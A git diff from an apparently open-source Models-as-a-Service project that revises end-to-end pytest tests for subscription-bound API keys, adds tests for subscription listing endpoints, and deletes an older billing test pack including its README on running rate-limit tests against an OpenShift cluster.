+                f"{_maas_api_url()}/v1/api-keys",
+                headers={
+                    "Authorization": f"Bearer {oc_token_user}",
+                    "Content-Type": "application/json",
+                },
+                json={"name": f"{sa_user}-bad-sub-key", "subscription": other_subscription},
+                timeout=TIMEOUT,
+                verify=TLS_VERIFY,
+            )
+            assert r.status_code == 400, f"Expected 400, got {r.status_code}: {r.text[:500]}"
+            assert r.json().get("code") == "invalid_subscription", r.text
+            log.info("✅ Mint with inaccessible subscription → %s", r.status_code)
 
         finally:
             _delete_cr("maassubscription", user_subscription, namespace=ns)
@@ -1856,12 +1917,15 @@ def test_e2e_group_based_access_gets_200(self):
 
             _wait_reconcile()
 
-            # Create API key for inference
-            api_key = _create_api_key(oc_token, name=f"{sa_name}-key")
+            api_key = _create_api_key(
+                oc_token,
+                name=f"{sa_name}-key",
+                subscription=subscription_name,
+            )
 
             # Test: User matches via group membership → 200
             log.info("Testing: Group-based auth and subscription")
-            r = _poll_status(api_key, 200, path=MODEL_PATH, subscription=subscription_name, timeout=90)
+            r = _poll_status(api_key, 200, path=MODEL_PATH, timeout=90)
             log.info("✅ Group-based access → %s", r.status_code)
 
         finally:
@@ -1894,18 +1958,18 @@ def test_e2e_group_based_auth_but_no_subscription_gets_403(self):
             # Create auth policy using group
             _create_test_auth_policy(auth_policy_name, MODEL_REF, groups=[test_group])
 
-            # Delete simulator-subscription so user has no matching subscriptions
-            _delete_cr("maassubscription", SIMULATOR_SUBSCRIPTION)
+            api_key = _create_api_key(
+                oc_token,
+                name=f"{sa_name}-key",
+                subscription=SIMULATOR_SUBSCRIPTION,
+            )
 
+            _delete_cr("maassubscription", SIMULATOR_SUBSCRIPTION)
             _wait_reconcile()
 
-            # Create API key for inference
-            api_key = _create_api_key(oc_token, name=f"{sa_name}-key")
-
-            # Test: Group auth passes but no subscription for that group → 403
-            log.info("Testing: Group-based auth but no subscription")
-            r = _poll_status(api_key, 403, path=MODEL_PATH, subscription=False, timeout=90)
-            log.info("✅ Group auth but no subscription → %s", r.status_code)
+            log.info("Testing: Group-based auth; key bound to removed subscription")
+            r = _poll_status(api_key, 403, path=MODEL_PATH, timeout=90)
+            log.info("✅ Group auth but no live subscription for bound key → %s", r.status_code)
 
         finally:
             # Restore simulator-subscription first
@@ -1951,12 +2015,15 @@ def test_e2e_group_based_subscription_but_no_auth_gets_403(self):
 
             _wait_reconcile()
 
-            # Create API key for inference
-            api_key = _create_api_key(oc_token, name=f"{sa_name}-key")
+            api_key = _create_api_key(
+                oc_token,
+                name=f"{sa_name}-key",
+                subscription=subscription_name,
+            )
 
             # Test: Has subscription via group but no auth → 403
             log.info("Testing: Group-based subscription but no auth")
-            r = _poll_status(api_key, 403, path=MODEL_PATH, subscription=subscription_name, timeout=90)
+            r = _poll_status(api_key, 403, path=MODEL_PATH, timeout=90)
             log.info("✅ Group subscription but no auth → %s", r.status_code)
 
         finally:
@@ -1967,4 +2034,3 @@ def test_e2e_group_based_subscription_but_no_auth_gets_403(self):
             _delete_cr("maasauthpolicy", auth_policy_name, namespace=ns)
             _delete_sa(sa_name, namespace=ns)
             _wait_reconcile()
-
diff --git a/test/e2e/tests/test_subscription_list_endpoints.py b/test/e2e/tests/test_subscription_list_endpoints.py
new file mode 100644
index 000000000..c5fc8550e
--- /dev/null
+++ b/test/e2e/tests/test_subscription_list_endpoints.py
@@ -0,0 +1,273 @@
+"""
+E2E tests for the subscription listing endpoints:
+  - GET /v1/subscriptions
+  - GET /v1/model/:model-id/subscriptions
+
+These endpoints return SubscriptionInfo objects with fields:
+  subscription_id_header, subscription_description, display_name, priority,
+  model_refs, organization_id, cost_center, labels
+
+Requires same environment setup as test_subscription.py.
+"""
+
+import json
+import logging
+import os
+
+import pytest
+import requests
+
+from test_subscription import (
+    _create_api_key,
+    _create_sa_token,
+    _create_test_auth_policy,
+    _create_test_subscription,
+    _delete_cr,
+    _delete_sa,
+    _maas_api_url,
+    _ns,
+    _sa_to_user,
+    _wait_reconcile,
+    MODEL_NAMESPACE,
+    MODEL_REF,
+    DISTINCT_MODEL_REF,
+    DISTINCT_MODEL_2_REF,
+    SIMULATOR_SUBSCRIPTION,
+    TIMEOUT,
+    TLS_VERIFY,
+)
+
+log = logging.getLogger(__name__)
+
+
+def _validate_subscription_info_schema(sub):
+    """Validate a SubscriptionInfo object has the expected structure."""
+    assert "subscription_id_header" in sub, f"Missing subscription_id_header: {sub}"
+    assert isinstance(sub["subscription_id_header"], str), "subscription_id_header must be string"
+
+    assert "subscription_description" in sub, f"Missing subscription_description: {sub}"
+    assert isinstance(sub["subscription_description"], str), "subscription_description must be string"
+
+    assert "priority" in sub, f"Missing priority: {sub}"
+    assert isinstance(sub["priority"], int), "priority must be integer"
+
+    assert "model_refs" in sub, f"Missing model_refs: {sub}"
+    assert isinstance(sub["model_refs"], list), "model_refs must be a list"
+
+    # Validate model_refs structure
+    for ref in sub["model_refs"]:
+        assert "name" in ref, f"model_ref missing name: {ref}"
+        assert isinstance(ref["name"], str), "model_ref name must be string"
+
+    # Optional fields
+    if "display_name" in sub:
+        assert isinstance(sub["display_name"], str), "display_name must be string"
+    if "organization_id" in sub:
+        assert isinstance(sub["organization_id"], str), "organization_id must be string"
+    if "cost_center" in sub:
+        assert isinstance(sub["cost_center"], str), "cost_center must be string"
+    if "labels" in sub:
+        assert isinstance(sub["labels"], dict), "labels must be a dict"
+
+
+class TestListSubscriptions:
+    """E2E tests for GET /v1/subscriptions."""
+
+    def test_returns_accessible_subscriptions(self):
+        """Authenticated user gets their accessible subscriptions."""
+        sa_name = "e2e-list-subs-sa"
+        sa_ns = "default"
+
+        try:
+            sa_token = _create_sa_token(sa_name, namespace=sa_ns)
+            api_key = _create_api_key(sa_token, name=f"{sa_name}-key")
+
+            _wait_reconcile()
+
+            url = f"{_maas_api_url()}/v1/subscriptions"
+            r = requests.get(
+                url,
+                headers={"Authorization": f"Bearer {api_key}"},
+                timeout=TIMEOUT,
+                verify=TLS_VERIFY,
+            )
+
+            assert r.status_code == 200, f"Expected 200, got {r.status_code}: {r.text}"
+
+            data = r.json()
+            assert isinstance(data, list), f"Expected array response, got {type(data).__name__}"
+
+            # User should have at least one subscription (simulator-subscription via system:authenticated)
+            assert len(data) >= 1, f"Expected at least 1 subscription, got {len(data)}"
+
+            # Validate schema of each subscription
+            for sub in data:
+                _validate_subscription_info_schema(sub)
+
+            # Verify simulator-subscription is present
+            sub_ids = [s["subscription_id_header"] for s in data]
+            assert SIMULATOR_SUBSCRIPTION in sub_ids, \
+                f"Expected '{SIMULATOR_SUBSCRIPTION}' in accessible subscriptions, got {sub_ids}"
+
+            log.info(f"GET /v1/subscriptions -> {r.status_code} with {len(data)} subscription(s): {sub_ids}")
+
+        finally:
+            _delete_sa(sa_name, namespace=sa_ns)
+
+    def test_unauthenticated_returns_401(self):
+        """Request without auth returns 401."""
+        url = f"{_maas_api_url()}/v1/subscriptions"
+        r = requests.get(url, timeout=TIMEOUT, verify=TLS_VERIFY)
+        assert r.status_code == 401, f"Expected 401, got {r.status_code}: {r.text}"
+        log.info(f"GET /v1/subscriptions (no auth) -> {r.status_code}")
+
+    def test_subscription_includes_model_refs(self):
+        """Subscriptions include model_refs with name and rate limit info."""
+        sa_name = "e2e-list-subs-refs-sa"
+        sa_ns = "default"
+        maas_ns = _ns()
+        subscription_name = "e2e-list-subs-refs-sub"
+
+        try:
+            sa_token = _create_sa_token(sa_name, namespace=sa_ns)
+            sa_user = _sa_to_user(sa_name, namespace=sa_ns)
+
+            _create_test_subscription(
+                subscription_name, MODEL_REF,
+                users=[sa_user],
+                token_limit=500, window="1h",
+            )
+
+            api_key = _create_api_key(sa_token, name=f"{sa_name}-key")
+            _wait_reconcile()
+
+            url = f"{_maas_api_url()}/v1/subscriptions"
+            r = requests.get(
+                url,
+                headers={"Authorization": f"Bearer {api_key}"},
+                timeout=TIMEOUT,
+                verify=TLS_VERIFY,
+            )
+
+            assert r.status_code == 200
+            data = r.json()
+
+            # Find our test subscription
+            test_sub = next(
+                (s for s in data if s["subscription_id_header"] == subscription_name),
+                None,
+            )
+            assert test_sub is not None, \
+                f"Test subscription '{subscription_name}' not found in {[s['subscription_id_header'] for s in data]}"
+
+            # Validate model_refs
+            assert len(test_sub["model_refs"]) >= 1, "Expected at least 1 model_ref"
+            ref = test_sub["model_refs"][0]
+            assert ref["name"] == MODEL_REF, f"Expected model_ref name '{MODEL_REF}', got '{ref['name']}'"
+
+            # Validate token_rate_limits if present
+            if "token_rate_limits" in ref and ref["token_rate_limits"]:
+                trl = ref["token_rate_limits"][0]
+                assert "limit" in trl, "token_rate_limit missing 'limit'"
+                assert "window" in trl, "token_rate_limit missing 'window'"
+
+            log.info(f"Subscription '{subscription_name}' has model_refs: {test_sub['model_refs']}")
+
+        finally:
+            _delete_cr("maassubscription", subscription_name, namespace=maas_ns)
+            _delete_sa(sa_name, namespace=sa_ns)
+
+
+class TestListSubscriptionsForModel:
+    """E2E tests for GET /v1/model/:model-id/subscriptions."""
+
+    def test_returns_subscriptions_for_model(self):
+        """Returns only subscriptions that include the requested model."""
+        sa_name = "e2e-subs-model-sa"
+        sa_ns = "default"
+        maas_ns = _ns()
+        sub_with_model = "e2e-subs-model-match"
+        sub_without_model = "e2e-subs-model-nomatch"
+
+        try:
+            sa_token = _create_sa_token(sa_name, namespace=sa_ns)
+            sa_user = _sa_to_user(sa_name, namespace=sa_ns)
+
+            # Create two subscriptions: one with DISTINCT_MODEL_REF, one with DISTINCT_MODEL_2_REF
+            _create_test_subscription(sub_with_model, DISTINCT_MODEL_REF, users=[sa_user])
+            _create_test_subscription(sub_without_model, DISTINCT_MODEL_2_REF, users=[sa_user])
+
+            api_key = _create_api_key(sa_token, name=f"{sa_name}-key")
+            _wait_reconcile()
+
+            # Query for subscriptions that include DISTINCT_MODEL_REF
+            url = f"{_maas_api_url()}/v1/model/{DISTINCT_MODEL_REF}/subscriptions"
+            r = requests.get(
+                url,
+                headers={"Authorization": f"Bearer {api_key}"},
+                timeout=TIMEOUT,
+                verify=TLS_VERIFY,
+            )
+
+            assert r.status_code == 200, f"Expected 200, got {r.status_code}: {r.text}"
+
+            data = r.json()
+            assert isinstance(data, list), f"Expected array response, got {type(data).__name__}"
+
+            sub_ids = [s["subscription_id_header"] for s in data]
+
+            # The matching subscription should be present
+            assert sub_with_model in sub_ids, \
+                f"Expected '{sub_with_model}' in results, got {sub_ids}"
+
+            # The non-matching subscription should NOT be present
+            assert sub_without_model not in sub_ids, \
+                f"'{sub_without_model}' should not be in results for model {DISTINCT_MODEL_REF}, got {sub_ids}"
+
+            # Validate schema
+            for sub in data:
+                _validate_subscription_info_schema(sub)
+
+            log.info(f"GET /v1/model/{DISTINCT_MODEL_REF}/subscriptions -> {len(data)} subscription(s): {sub_ids}")
+
+        finally:
+            _delete_cr("maassubscription", sub_with_model, namespace=maas_ns)
+            _delete_cr("maassubscription", sub_without_model, namespace=maas_ns)
+            _delete_sa(sa_name, namespace=sa_ns)
+
+    def test_unknown_model_returns_empty(self):
+        """Querying subscriptions for a model not in any subscription returns empty list."""
+        sa_name = "e2e-subs-unknown-model-sa"
+        sa_ns = "default"
+
+        try:
+            sa_token = _create_sa_token(sa_name, namespace=sa_ns)
+            api_key = _create_api_key(sa_token, name=f"{sa_name}-key")
+
+            _wait_reconcile()
+
+            url = f"{_maas_api_url()}/v1/model/nonexistent-model-xyz/subscriptions"
+            r = requests.get(
+                url,
+                headers={"Authorization": f"Bearer {api_key}"},
+                timeout=TIMEOUT,
+                verify=TLS_VERIFY,
+            )
+
+            assert r.status_code == 200, f"Expected 200, got {r.status_code}: {r.text}"
+
+            data = r.json()
+            assert isinstance(data, list), f"Expected array response, got {type(data).__name__}"
+            assert len(data) == 0, f"Expected empty list for unknown model, got {len(data)}: {data}"
+
+            log.info(f"GET /v1/model/nonexistent-model-xyz/subscriptions -> {r.status_code} with [] (empty)")
+
+        finally:
+            _delete_sa(sa_name, namespace=sa_ns)
+
+    def test_unauthenticated_returns_401(self):
+        """Request without auth returns 401."""
+        url = f"{_maas_api_url()}/v1/model/{MODEL_REF}/subscriptions"
+        r = requests.get(url, timeout=TIMEOUT, verify=TLS_VERIFY)
+        assert r.status_code == 401, f"Expected 401, got {r.status_code}: {r.text}"
+        log.info(f"GET /v1/model/{MODEL_REF}/subscriptions (no auth) -> {r.status_code}")
diff --git a/test/maas_billing_tests_independent/.gitignore b/test/maas_billing_tests_independent/.gitignore
deleted file mode 100644
index 109ad0bf1..000000000
--- a/test/maas_billing_tests_independent/.gitignore
+++ /dev/null
@@ -1,27 +0,0 @@
-# --- Python virtual env (local) ---
-.venv/
-venv/
-
-# --- Python caches & compiled files ---
-__pycache__/
-*.pyc
-
-# --- Test caches & coverage ---
-.pytest_cache/
-.mypy_cache/
-.ruff_cache/
-.tox/
-.coverage
-coverage.xml
-htmlcov/
-
-# --- Keep these folders but ignore their contents ---
-artifacts/*
-!artifacts/.gitkeep
-
-reports/*
-!reports/.gitkeep
-
-# --- Certs kept out of Git (scoped to this folder) ---
-ingress-ca.crt
-tests/ingress-ca.crt
diff --git a/test/maas_billing_tests_independent/pytest.ini b/test/maas_billing_tests_independent/pytest.ini
deleted file mode 100644
index 3591f3c56..000000000
--- a/test/maas_billing_tests_independent/pytest.ini
+++ /dev/null
@@ -1,2 +0,0 @@
-[pytest]
-addopts = -ra
diff --git a/test/maas_billing_tests_independent/requirements.txt b/test/maas_billing_tests_independent/requirements.txt
deleted file mode 100644
index 547de5c5b..000000000
--- a/test/maas_billing_tests_independent/requirements.txt
+++ /dev/null
@@ -1,2 +0,0 @@
-pytest
-requests
diff --git a/test/maas_billing_tests_independent/tests/README.MD b/test/maas_billing_tests_independent/tests/README.MD
deleted file mode 100644
index 889a10299..000000000
--- a/test/maas_billing_tests_independent/tests/README.MD
+++ /dev/null
@@ -1,397 +0,0 @@
-# Models-as-a-Service Tests — How to Run (Admin / Free / Premium)
-
-This guide shows how to run the **maas_billing_tests_independent** test pack
-against **your OpenShift cluster** and **whatever model is installed**.  
-It covers Admin, Free, and Premium and shows how to generate HTML/JUnit reports.
-
-**No code changes are required.**
-
----
-
-## 0) Prerequisites
-
-- Python **3.10+**
-- `oc` CLI (logged into your cluster)
-- `jq` (recommended) – `sudo apt-get install -y jq` on Debian/Ubuntu/WSL
-- Shell: commands use **bash/WSL**; PowerShell equivalents are at the end.
-
-Create a venv and install deps:
-
-```bash
-cd maas_billing_tests_independent
-python3 -m venv .venv
-source .venv/bin/activate
-pip install -r requirements.txt
-
-# (optional) pretty HTML report
-pip install pytest-html
-```
----
-
-## 1) Login & environment (run in every new shell)
-
-Login as the user you want to test (Admin first, later Free and Premium):
-
-```bash
-oc login https://api.<cluster>:6443 --token '<your-user-token>'
-oc whoami
-```
-
-Resolve Route host and set base URLs:
-
-```bash
-CLUSTER_DOMAIN=$(oc get ingresses.config.openshift.io cluster -o jsonpath='{.spec.domain}')
-HOST="maas.${CLUSTER_DOMAIN}"                          # note: no "-api" here
-export MAAS_API_BASE_URL="http://${HOST}/maas-api"    # point directly to /maas-api
-export USAGE_API_BASE="$MAAS_API_BASE_URL"
-
-export FREE_OC_TOKEN="$(oc whoami -t)"
-```
-
-Pick a **MODEL_NAME** from the catalog (`id` field):
-
-```bash
-curl -s -H "Authorization: Bearer ${FREE_OC_TOKEN}" "${MAAS_API_BASE_URL}/v1/models" | jq -r '.data[] | [.id,.name,.url] | @tsv'
-export MODEL_NAME="<paste-id-from-output>"     # e.g., facebook/opt-125m
-export MODEL_URL="<paste-url-from-output>"     # direct model URL, e.g. maas.apps.ci-ln-t6jfcg2-76ef8.aws-2.ci.openshift.org/llm/facebook-opt-125m-simulated/v1/chat/completions
-```
----
-
-## 2) Configure limits the tests will use
-
-### 2.1 Request-rate bursts (Free & Premium)
-
-Read your gateway **RateLimitPolicy** values and export them so the tests know
-what to expect:
-
-```bash
-# FREE request-rate burst (per window)
-export RATE_LIMIT_BURST_FREE=$(
-  oc -n openshift-ingress get ratelimitpolicies.kuadrant.io gateway-rate-limits \
-  -o jsonpath='{.spec.limits.free.rates[0].limit}'
-)
-
-# Premium (optional; only needed for the Free-vs-Premium test)
-export RATE_LIMIT_BURST_PREMIUM=$(
-  oc -n openshift-ingress get ratelimitpolicies.kuadrant.io gateway-rate-limits \
-  -o jsonpath='{.spec.limits.enterprise.rates[0].limit}'
-)
-```
-
-### 2.2 Keep request-rate tests away from token-rate limits
-
-Use small per-call generation and a short delay (these defaults work well):
-
-```bash
-export TOKENS_PER_CALL_SMALL=16
-export BURST_SLEEP=0.05
-```
-
-> You can override any of these per run without editing the code.
-
----
-
-## 3) Run tests — by role
-
-Re-run the login + `export` lines when you switch users.  
-The suite assumes **`FREE_OC_TOKEN`** holds the *current* user’s token.
-
-### A) Admin (sanity / wiring)
-
-```bash
-pytest -q test/maas_billing_tests_independent/tests/test_tokens.py::test_minted_token_is_jwt
-pytest -q test/maas_billing_tests_independent/tests/test_models_user.py
-pytest -q test/maas_billing_tests_independent/tests/test_gateway_endpoints.py::test_chat_completion_works
-```
-
-### B) Free user (authz + request-rate burst + usage)
-
-```bash
-# log in as a *Free* user, then:
-export FREE_OC_TOKEN="$(oc whoami -t)"
-
-# basics
-pytest -q test/maas_billing_tests_independent/tests/test_tokens.py::test_minted_token_is_jwt
-pytest -q test/maas_billing_tests_independent/tests/test_models_user.py
-pytest -q test/maas_billing_tests_independent/tests/test_gateway_endpoints.py::test_chat_completion_works
-
-# request-rate burst (expects some 429s after RATE_LIMIT_BURST_FREE)
-pytest -q test/maas_billing_tests_independent/tests/test_quota_global.py::test_rate_limit_burst
-
-# usage (optional; requires USAGE_API_BASE)
-pytest -q test/maas_billing_tests_independent/tests/test_usage_logs.py
-```
-
-#### Token‑rate for Free
-Trigger token-based limiting by making each call expensive in tokens:
-```bash
-export TOKENS_PER_CALL_LARGE=1200
-pytest -q test/maas_billing_tests_independent/tests/test_token_ratelimit.py
-```
-
-#### Interplay for Free — which limiter fires first?
-**Request‑rate first:** many *cheap* calls
-```bash
-export TOKENS_PER_CALL_SMALL=16
-export BURST_SLEEP=0.05
-pytest -q test/maas_billing_tests_independent/tests/test_quota_global.py::test_rate_limit_burst
-```
-**Token‑rate first:** few *expensive* calls
-```bash
-export TOKENS_PER_CALL_LARGE=1200
-pytest -q test/maas_billing_tests_independent/tests/test_token_ratelimit.py
-```
-
-### C) Premium user (same flow + Free-vs-Premium comparison)
-
-```bash
-# log in as a *Premium* user, then:
-export FREE_OC_TOKEN="$(oc whoami -t)"     # current user’s token again
-export PREMIUM_OC_TOKEN="$FREE_OC_TOKEN"   # used by the test to mint for premium
-
-pytest -q test/maas_billing_tests_independent/tests/test_gateway_endpoints.py::test_chat_completion_works
-
-# Compare Free vs Premium burst; Premium must not be worse than Free
-# (uses RATE_LIMIT_BURST_FREE / RATE_LIMIT_BURST_PREMIUM)
-pytest -q test/maas_billing_tests_independent/tests/test_quota_per_user.py::test_free_vs_premium_quota
-```
-
-#### Token‑rate for Premium
-Run the token limiter test while logged in as your Premium user:
-```bash
-export TOKENS_PER_CALL_LARGE=1200
-pytest -q test/maas_billing_tests_independent/tests/test_token_ratelimit.py
-```
-
-#### Interplay for Premium — which limiter fires first?
-**Request‑rate first:** many *cheap* calls (uses `RATE_LIMIT_BURST_PREMIUM` if you exported it)
-```bash
-export TOKENS_PER_CALL_SMALL=16
-export BURST_SLEEP=0.05
-pytest -q test/maas_billing_tests_independent/tests/test_quota_global.py::test_rate_limit_burst
-```
-**Token‑rate first:** few *expensive* calls
-```bash
-export TOKENS_PER_CALL_LARGE=1200
-pytest -q test/maas_billing_tests_independent/tests/test_token_ratelimit.py
-```
-
-### D) Token-rate (current user – Free **or** Premium)
-
-If you want to *exercise* token-rate limiting, increase tokens per call to make it trip:
-
-```bash
-export TOKENS_PER_CALL_LARGE=1200   # example value to drive token usage
-pytest -q test/maas_billing_tests_independent/tests/test_token_ratelimit.py
-```
-
----
-
-## 3E) Interplay: which limiter applies first? (request‑rate vs token‑rate)
-
-The gateway evaluates **both** limiters on every call; you get **429** as soon as **either** limit is exceeded.  
-By shaping traffic as above (many *cheap* calls vs few *expensive* calls), you can show each limiter firing first, proving both are active on your cluster.
-
----
-
-## 4) Reports (HTML & JUnit)
-
-```bash
-# Create a timestamped artifacts folder
-REP_ROOT=test/maas_billing_tests_independent/artifacts
-TS=$(date +%Y-%m-%d_%H-%M-%S)
-OUT="$REP_ROOT/$TS"
-mkdir -p "$OUT"
-
-# Example: run everything for the current user and produce reports
-pytest -q test/maas_billing_tests_independent/tests \
-  --html="$OUT/maas-test-report.html" --self-contained-html \
-  --junitxml="$OUT/maas-test-report.xml"
-
-echo "Reports saved in: $OUT"
-# Note - The artifacts/ folder is kept in Git but its contents are ignored, so reports don't show in PRs
-```
-
-### 4.1 Smoke tests & single test (saved under artifacts/)
-
-```bash
-# 3 smoke tests → one report
-REP_ROOT=test/maas_billing_tests_independent/artifacts
-TS=$(date +%Y-%m-%d_%H-%M-%S)
-OUT="$REP_ROOT/$TS"
-mkdir -p "$OUT"
-
-pytest -q \
-  test/maas_billing_tests_independent/tests/test_tokens.py::test_minted_token_is_jwt \
-  test/maas_billing_tests_independent/tests/test_models_user.py \
-  test/maas_billing_tests_independent/tests/test_gateway_endpoints.py::test_chat_completion_works \
-  --html="$OUT/smoke.html" --self-contained-html \
-  --junitxml="$OUT/smoke.xml"
-
-# Single test → its own report
-pytest -q test/maas_billing_tests_independent/tests/test_gateway_endpoints.py::test_chat_completion_works \
-  --html="$OUT/chat.html" --self-contained-html \
-  --junitxml="$OUT/chat.xml"
-```
-
----
-
-## 5) What each test does (cheat-sheet)
-
-- `tests/test_tokens.py` – mints a short-lived MaaS JWT from your OC token.
-- `tests/test_models_user.py` – lists models; asserts your `MODEL_NAME` exists.
-- `tests/test_gateway_endpoints.py` – discovers the model’s **URL** via `/v1/models`
-  then calls **`<model-url>/v1/chat/completions`** and expects a normal reply.
-- `tests/test_quota_global.py` – sends **N = RATE_LIMIT_BURST_FREE + 5** quick calls with
-  low tokens; expects ≥ `RATE_LIMIT_BURST_FREE` successes and then **429** (request-rate limiter).
-- `tests/test_quota_per_user.py` – runs the same quick burst for Free & Premium; asserts
-  **Premium ≥ Free** (Premium is not more restricted).
-- `tests/test_token_ratelimit.py` (optional) – cranks up token usage to hit the token-rate
-  limiter and prints usage headers:
-  `x-odhu-usage-input-tokens`, `x-odhu-usage-output-tokens`, `x-odhu-usage-total-tokens`.
-- `tests/test_usage_logs.py` (optional) – smoke call + probe of the Usage API endpoint.
-
----
-
-### 5A) Tool Calling
-
-Validates vLLM tool calling end-to-end through MaaS.  
-Works with Qwen/Qwen3-0.6B (or any model deployed with tool calling enabled).
-
-### Prereqs
-
-The model deployment must enable tool calling, e.g. vLLM args include:
-- `--tool-call-parser qwen3_xml`
-- `--enable-auto-tool-choice`
-
-The MaaS token endpoint may reject short TTLs. Use ≥ 10m.
-
-### Run tests
-
-```bash
-# Pick a model that supports tool calling:
-export MODEL_NAME="Qwen/Qwen3-0.6B"
-# Gate to enable these tests
-export TOOL_CALLING_ENABLED=true
-
-pytest -q test/maas_billing_tests_independent/tests/test_tool_calling.py::test_tool_calling_forced -s \
-  --html="$OUT/tool-calling-forced.html" --self-contained-html \
-  --junitxml="$OUT/tool-calling-forced.xml"
-```
-
-### 5B) Streaming (SSE) chat completions
-
-Validates that the model endpoint supports Server-Sent Events with `stream:true`:
-- Confirms Content-Type: `text/event-stream`
-- Parses data: frames as JSON (`choices[].delta.content`)
-- Reconstructs non-empty text from chunks
-- Ensures the stream ends with `[DONE]`
-
-```bash
-# Enable the streaming test (and extra logs)
-STREAMING_ENABLED=true STREAMING_DEBUG=true \
-pytest -q test/maas_billing_tests_independent/tests/test_streaming_chat.py::test_chat_completions_streaming \
-  -s --capture=tee-sys \
-  --html="$OUT/streaming.html" --self-contained-html \
-  --junitxml="$OUT/streaming.xml"
-
-echo "Streaming reports saved in: $OUT"
-```
-
-## 6) PowerShell equivalents (Windows)
-
-```powershell
-# venv
-python -m venv .venv
-. .\.venv\Scripts\Activate
-pip install -r requirements.txt
-# (optional) pip install pytest-html
-
-# login (role of your choice)
-oc login https://api.<cluster>:6443 --token '<token>'
-
-# resolve Route host (avoid $HOST which is reserved in PS)
-$CLUSTER_DOMAIN = oc get ingresses.config.openshift.io cluster -o jsonpath='{.spec.domain}'
-$ROUTE_HOST = "maas-api.$CLUSTER_DOMAIN"
-
-# MaaS API base URL (route-based)
-$env:MAAS_API_BASE_URL = "https://$ROUTE_HOST"
-$env:USAGE_API_BASE    = $env:MAAS_API_BASE_URL
-
-$env:FREE_OC_TOKEN     = oc whoami -t
-$env:MODEL_NAME        = "<model-id>"        # from /v1/models
-
-# request-rate bursts
-$env:RATE_LIMIT_BURST_FREE    = "5"          # put your Free limit here
-$env:RATE_LIMIT_BURST_PREMIUM = "20"         # put your Premium limit here
-
-# keep token usage low in request-rate tests
-$env:TOKENS_PER_CALL_SMALL = "16"
-$env:BURST_SLEEP = "0.05"
-
-# run
-pytest -q tests/test_tokens.py::test_minted_token_is_jwt
-pytest -q tests/test_models_user.py
-pytest -q tests/test_gateway_endpoints.py::test_chat_completion_works
-pytest -q tests/test_quota_global.py::test_rate_limit_burst
-
-# report (timestamped artifacts folder)
-$REP_ROOT = "test\maas_billing_tests_independent\artifacts"
-$TS = Get-Date -Format "yyyy-MM-dd_HH-mm-ss"
-$OUT = "$REP_ROOT\$TS"
-New-Item -ItemType Directory -Force -Path $OUT | Out-Null
-
-pytest -q test/maas_billing_tests_independent/tests `
-  --html="$OUT\maas-test-report.html" --self-contained-html `
-  --junitxml="$OUT\maas-test-report.xml"
-
-Write-Host "Reports saved in: $OUT"
-```
-
-> In PowerShell, **do not** use `$HOST`; use `$ROUTE_HOST`.
-
----
-
-## 7) TL;DR (copy-paste)
-
-```bash
-# venv
-python3 -m venv .venv && source .venv/bin/activate && pip install -r requirements.txt
-
-# login & env
-oc login https://api.<cluster>:6443 --token '<token>'
-
-CLUSTER_DOMAIN=$(oc get ingresses.config.openshift.io cluster -o jsonpath='{.spec.domain}')
-HOST="maas-api.${CLUSTER_DOMAIN}"
-export MAAS_API_BASE_URL="https://${HOST}"
-
-export USAGE_API_BASE="$MAAS_API_BASE_URL"
-export FREE_OC_TOKEN="$(oc whoami -t)"
-
-# pick a model
-curl -s -H "Authorization: Bearer ${FREE_OC_TOKEN}" "${MAAS_API_BASE_URL}/v1/models" | jq -r '.data[] | [.id,.name,.url] | @tsv'
-export MODEL_NAME="<model-id>"
-
-# bursts from your RLP
-export RATE_LIMIT_BURST_FREE=5
-export RATE_LIMIT_BURST_PREMIUM=20
-
-# safe defaults for burst tests
-export TOKENS_PER_CALL_SMALL=16
-export BURST_SLEEP=0.05
-
-# run a few
-pytest -q test/maas_billing_tests_independent/tests/test_tokens.py::test_minted_token_is_jwt
-pytest -q test/maas_billing_tests_independent/tests/test_models_user.py
-pytest -q test/maas_billing_tests_independent/tests/test_gateway_endpoints.py::test_chat_completion_works
-pytest -q test/maas_billing_tests_independent/tests/test_quota_global.py::test_rate_limit_burst
-
-# report (timestamped artifacts folder)
-REP_ROOT=test/maas_billing_tests_independent/artifacts
-TS=$(date +%Y-%m-%d_%H-%M-%S)
-OUT="$REP_ROOT/$TS"
-mkdir -p "$OUT"
-pytest -q test/maas_billing_tests_independent/tests \
-  --html="$OUT/maas-test-report.html" --self-contained-html \
-  --junitxml="$OUT/maas-test-report.xml"
-```
diff --git a/test/maas_billing_tests_independent/tests/conftest.py b/test/maas_billing_tests_independent/tests/conftest.py
deleted file mode 100644
index 04987fabb..000000000
--- a/test/maas_billing_tests_independent/tests/conftest.py
+++ /dev/null
@@ -1,301 +0,0 @@
-"""
-Shared test helpers/fixtures for MaaS billing tests.
-
-What this file provides:
-- http(requests.Session)       -> respects REQUESTS_VERIFY and INGRESS_CA_PATH (default verify=True)
-- base_url                     -> from $MAAS_API_BASE_URL (skips suite if not set)
-- model_name                   -> from $MODEL_NAME
-- bearer(token)                -> {"Authorization": f"Bearer <token>"}
-- ensure_free_key/ensure_premium_key:
-    Try to mint a MaaS JWT via /v1/tokens or /tokens (with/without body).
-    If minting isn't available, fall back to the OC token so tests still run.
-- mint_maas_key/revoke_maas_key for explicit control in tests
-- parse_usage_headers()        -> reads x-odhu-usage-* headers
-- get_limit(env_name, fallback_key, default_val):
-    env override -> cluster CR discovery (RLP/TRLP) -> default
-- Simple http_get/http_post wrappers (optional convenience)
-"""
-
-from __future__ import annotations
-import os, json, base64, subprocess
-import pytest, requests
-
-# -------------------------- Env & constants --------------------------
-
-BASE_URL         = os.getenv("MAAS_API_BASE_URL", "").rstrip("/")
-MODEL_NAME       = os.getenv("MODEL_NAME")
-FREE_OC_TOKEN    = os.getenv("FREE_OC_TOKEN", "")
-PREMIUM_OC_TOKEN = os.getenv("PREMIUM_OC_TOKEN", "")
-USAGE_API_BASE   = os.getenv("USAGE_API_BASE", BASE_URL)
-
-# Optional custom CA for HTTPS clusters; not required for HTTP
-INGRESS_CA_PATH  = os.getenv("INGRESS_CA_PATH", "")
-
-USAGE_HEADERS = [
-    "x-odhu-usage-input-tokens",
-    "x-odhu-usage-output-tokens",
-    "x-odhu-usage-total-tokens",
-]
-
-def _env_bool(name: str, default: bool) -> bool:
-    v = os.getenv(name)
-    if v is None:
-        return default
-    return str(v).strip().lower() not in ("0", "false", "no", "off")
-
-# -------------------------- Pytest fixtures --------------------------
-
-@pytest.fixture(scope="session")
-def base_url():
-    if not BASE_URL:
-        pytest.skip("MAAS_API_BASE_URL not set; skipping MaaS billing tests", allow_module_level=True)
-    return BASE_URL
-
-@pytest.fixture(scope="session")
